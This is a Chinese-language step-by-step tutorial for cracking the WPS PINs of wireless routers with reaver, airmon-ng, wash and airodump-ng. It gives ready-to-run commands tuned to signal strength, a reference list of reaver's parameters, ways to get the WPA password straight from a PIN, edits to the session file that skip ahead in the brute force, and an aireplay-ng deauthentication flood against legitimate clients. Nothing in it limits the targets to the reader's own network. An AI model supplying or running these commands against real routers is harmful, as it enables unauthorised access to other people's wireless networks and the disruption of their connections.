reaver跑路由器pin码过程：(root权限下)

1 输入：airmon-ng start wlan0 开启监听模式

2 输入：wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C，结束进程,这时记下你要PJ的目标路由MAC.

3 输入：airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..)，按Ctrl+C，结束扫描.

4 输入：reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码

reaver 参数详解：

-i, –interface= Name of the monitor-mode interface to use

网卡的监视接口，通常是mon0(必需)

-b, –bssid= BSSID of the target AP

AP的MAC地址(必需)

-c, –channel= Set the 802.11 channel for the interface (implies -f)

信号的频道，如果不指定会自动扫描，如-c1 指定1频道(常用)

-a, –auto Auto detect the best advanced options for the target AP

对目标AP自动检测高级参数，自动检测目标AP最佳配置(常用)

-v, –verbose Display non-critical warnings (-vv for more)

显示不重要警告信息 -vv 可以显示更多(常用)

-S 使用最小的DH key，可以提高PJ速度(常用)

-t 即timeout每次穷举等待反馈的最长时间(常用)

-s, –session= Restore a previous session file

恢复进度文件

-N, –no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息

-n, –nack Target AP always sends a NACK [Auto]

对目标AP总是发送NACK，默认自动

-f, –fixed Disable channel hopping

禁止频道跳转

-p, –pin= Use the specified 4 or 8 digit WPS pin

使用指定的4位或者8位pin码，可以用8位直接找到密码(常用)

-d, –delay= Set the delay between pin attempts [1]

pin间延时，默认1秒(常用)

-l, –lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]

AP锁定WPS后等待时间

-g, –max-attempts= Quit after num pin attempts

最大pin次数

-q, –quiet Only display critical messages

只显示关键信息

-h, –help Show help

显示帮助

因状况调整参数(-c后面都已目标频道为1作为例子)

目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1

目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1

目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

常见问题的处理：

1.如果出现超长的WPA PSK可以使用第四条命令“reaver –i mon0 –b MAC –p WPA PSK”

MAC为目标的mac地址，WPA PSK为获取到的超长密码。作用是将指定的pin码获取

wpa密码psk。

2.reaver -i mon0 -b MAC -p PIN8位数

直接由pin码得到psk密码

3.90.9%进程后出现问题或卡死，请记下PIN前四位数，重新跑后三位数，如果前四位正确的话

reaver -i mon0 -b MAC -p PIN前4位数

4.PIN僵死锁定后的方法。也可以攻击隐藏ssid的路由 aireplay-ng-0 1000 -a SSID 的MAC -c 合法客户端的MAC 网卡端口

就是让客户端断开连接1000次macchanger

pin码的进度文件保存在/usr/local/etc/下，XXXXXXXXXXXX.wpc (MAC地址为文件名)

MAC.wpc结构

0                  //第一行，这个地方是说它的前4位PIN码的进度位置数

0                  //第二行，这个地方是说后3位PIN数的已经运行测试位置数

0                  //第三行，0时没有找到，当为1时找到前四位，当为2时全部找到.

1234

0123

1111

2222

3333

.......

.......

如我们要从2000开始pin,你可以将第一行修改为2004,这样它就会从2000开始PIN了.

命令是这样的  reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -s /usr/local/etc/XXXXXXXXXXXX.wpc , 小写的-s后面跟进度文件的路径.